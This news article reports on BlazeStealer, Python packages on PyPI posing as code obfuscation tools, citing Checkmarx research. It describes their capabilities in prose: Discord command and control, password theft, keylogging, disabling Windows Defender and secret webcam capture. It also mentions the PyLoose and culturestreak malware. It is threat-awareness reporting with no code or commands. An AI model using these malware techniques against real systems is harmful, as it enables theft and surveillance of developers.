Malicious Python packages masquerading as legitimate code obfuscation tools are targeting developers via the PyPI code repository.
Focusing on those interested in code obfuscation is a savvy choice that could offer up organizational crown jewels, according to researchers at Checkmarx, who dubbed the malware “BlazeStealer.”
They warned on Nov. 8 that BlazeStealer is particularly concerning because it can exfiltrate host data, steal passwords, launch keyloggers, encrypt files, and execute host commands. It becomes even more dangerous thanks to the astute choice of targets, according to Checkmarx threat researcher Yehuda Gelb.
“Developers who engage in code obfuscation are likely working with valuable and sensitive information. As a result, hackers see them as valuable targets to pursue and therefore are likely to be the victims targeted in this attack,” Gelb explains.
BlazeStealer is the latest in a wave of compromised Python packages attackers have released in 2023. In July, Wiz researchers warned of PyLoose, malware consisting of Python code that loads an XMRig miner into a computer’s memory using the memfd Linux fileless process. At the time, Wiz observed nearly 200 instances in which the attackers used it for cryptomining.
For its part, Checkmark has tracked various malicious Python-based packages, including its September 2023 discovery of culturestreak, which runs a concurrent loop to tie up system resources for unauthorized Dero cryptocurrency mining.
Firing Up BlazeStealer Malware
The BlazeStealer payload can extract a malicious script from an external source, giving attackers complete control over the victim’s computer. According to Gelb, the malicious BlazeStealer payload activates once it is installed on the compromised system.
For command and control, BlazeStealer runs a bot carried via the Discord messaging service using a unique identifier.
“This bot, once activated, effectively provides the attacker full control of the target’s system, allowing them to perform a myriad of harmful actions on the victim’s machine,” Gelb warns. Besides gathering detailed host data, BlazeStealer can download files, deactivate Windows Defender and Task Manager, and lock a computer by overloading the CPU. It does the latter by running a batch script in the startup directory to shut down the computer, or forces a BSO error with a Python script.
BlazeStealer can also take control of a PC’s webcam using a bot that stealthily downloads a .ZIP file from a remote server and installs the freeware application WebCamImageSave.exe.
“This allows the bot to secretly capture a photo using the webcam. The resulting image is then sent back to the Discord channel without leaving any evidence of its presence after deleting the downloaded files,” Gelb notes.